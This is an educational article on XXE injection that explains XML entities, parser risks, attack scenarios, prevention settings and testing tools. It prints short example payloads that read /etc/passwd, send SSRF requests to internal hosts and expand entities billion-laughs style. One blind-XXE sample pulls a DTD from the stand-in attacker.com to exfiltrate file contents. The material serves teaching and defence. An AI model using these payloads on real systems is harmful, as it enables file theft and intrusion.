Understanding XML and XXE Injections
XML External Entity (XXE) injections are severe security vulnerabilities that exploit weaknesses in how applications parse XML input. Attackers inject malicious external entity references to access sensitive files, interact with internal systems, or exfiltrate data. These attacks often target web services, APIs, and applications that process XML without proper security controls.
How XXE Attacks Work
XXE vulnerabilities arise when an XML parser processes external entities—references to external files or resources—without validation. Here’s a simplified attack flow:
- Malicious XML Input: An attacker submits XML containing a crafted external entity.
- Parser Processing: The application’s XML parser resolves the entity, fetching the external resource.
- Data Exposure: The parser returns the contents of the external resource (e.g.,
/etc/passwd) in the response. - Impact: Unauthorized access to files, internal network scanning, or denial-of-service (DoS) attacks.
Example Attack Payload:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo>If parsed insecurely, this payload exposes the contents of
/etc/passwd.
Key Concepts Behind XXE
XML: The Foundation
XML (eXtensible Markup Language) is a markup language designed for storing and transporting structured data. Its human-readable format and flexibility make it widely used in:
- Web Services: SOAP and REST APIs for data exchange.
- Configuration Files: Application settings (e.g.,
web.config,pom.xml). - Document Storage: Structured data like invoices or medical records.
Document Type Definitions (DTDs)
DTDs define the structure and rules of an XML document, including:
- Element declarations: Valid tags and their hierarchy.
- Entity declarations: Placeholders for data, including external entities that can trigger XXE.
Critical Risk: DTDs can declare external entities (e.g.,
<!ENTITY xxe SYSTEM "http://attacker.com/malicious.dtd">), which parsers may resolve automatically.
XML Entities: The Attack Vector
Entities are variables in XML that substitute values. Types include:
| Entity Type | Description | XXE Risk |
|---|---|---|
| Internal | Defined within the XML document (e.g., <!ENTITY name "value">). | Low (unless expanded recursively). |
| External | References external resources (e.g., <!ENTITY xxe SYSTEM "file:///etc/passwd">). | High (primary XXE vector). |
| Parameter | Used in DTDs (e.g., <!ENTITY % param "value">). | Medium (can enable blind XXE). |
| General | Standard entities (e.g., < for <). | Low. |
| Character | Predefined entities (e.g., & for &). | Low. |
XML Parsers: The Weak Link
Parsers read and interpret XML. Common types and their risks:
| Parser | Description | XXE Vulnerability |
|---|---|---|
| DOM | Loads entire XML into memory; supports XPath queries. | High (processes external entities). |
| SAX | Event-driven, reads XML sequentially. | Medium (depends on configuration). |
| StAX | Stream-based, balances performance and memory. | Medium (if external entities enabled). |
| XPath | Queries XML data; can be exploited if combined with XXE. | High (e.g., XPath injection + XXE). |
Real-World XXE Attack Scenarios
1. File Disclosure
Attackers read sensitive files (e.g., /etc/shadow, config.php) by injecting external entities pointing to local files.
Example:
<!ENTITY file SYSTEM "file:///etc/passwd">
Impact: Exposure of credentials, API keys, or system configurations.
2. Server-Side Request Forgery (SSRF)
XXE can force the server to make requests to internal systems (e.g., http://localhost:8080/admin).
Example:
<!ENTITY ssrf SYSTEM "http://internal-server/admin">
Impact: Unauthorized access to internal APIs or databases.
3. Denial-of-Service (DoS)
Attackers exploit entity expansion to crash the parser (e.g., "billion laughs" attack).
Example:
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
Impact: Parser crashes due to exponential memory consumption.
4. Blind XXE
Attackers exfiltrate data without direct feedback by forcing the server to send data to an external server.
Example:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd">
%dtd;
Impact: Data exfiltration via out-of-band (OOB) channels.
How to Prevent XXE Attacks
1. Disable External Entities
Configure parsers to ignore external entities and DTDs entirely.
Example (Java):
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
2. Use Safe Parsers
Opt for parsers with secure defaults, such as:
- Java:
javax.xml.parsers.DocumentBuilderFactory(with secure features enabled). - Python:
defusedxmllibrary (replacesxml.etree.ElementTree). - PHP:
libxml_disable_entity_loader(true).
3. Input Validation
- Reject XML with DTDs or external entities.
- Use allowlists for expected XML structures.
4. Least Privilege
Run XML parsers in sandboxed environments with minimal permissions.
5. Monitor and Log
Log XML parsing errors and monitor for suspicious external entity references.
Common Misconfigurations Leading to XXE
| Misconfiguration | Risk | Fix |
|---|---|---|
| Enabling DTDs | Allows external entity declarations. | Disable DTDs (disallow-doctype-decl). |
| External entity resolution | Parsers fetch external resources. | Disable external entities (external-general-entities=false). |
| Recursive entity expansion | Enables DoS attacks (e.g., "billion laughs"). | Limit entity expansion depth. |
| Unrestricted file access | Attackers read arbitrary files. | Restrict file system access in parser configurations. |
| Outdated libraries | Vulnerable to known XXE exploits. | Update parsers (e.g., libxml2, Xerces). |
Tools to Test for XXE Vulnerabilities
| Tool | Purpose | Link |
|---|---|---|
| OWASP ZAP | Automated scanner for XXE and other web vulnerabilities. | https://www.zaproxy.org/ |
| Burp Suite | Manual testing with XXE payloads and out-of-band (OOB) detection. | https://portswigger.net/burp |
| XXEinjector | Automates XXE exploitation and data exfiltration. | https://github.com/enjoiz/XXEinjector |
| xmldecoder | Tests XML parsers for XXE and other vulnerabilities. | https://github.com/OWASP/xmldecoder |
Learn More
- OWASP XXE Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- PortSwigger XXE Labs: https://portswigger.net/web-security/xxe
- CWE-611: Improper Restriction of XML External Entity Reference: https://cwe.mitre.org/data/definitions/611.html
- Defused XML (Python Library): https://pypi.org/project/defusedxml/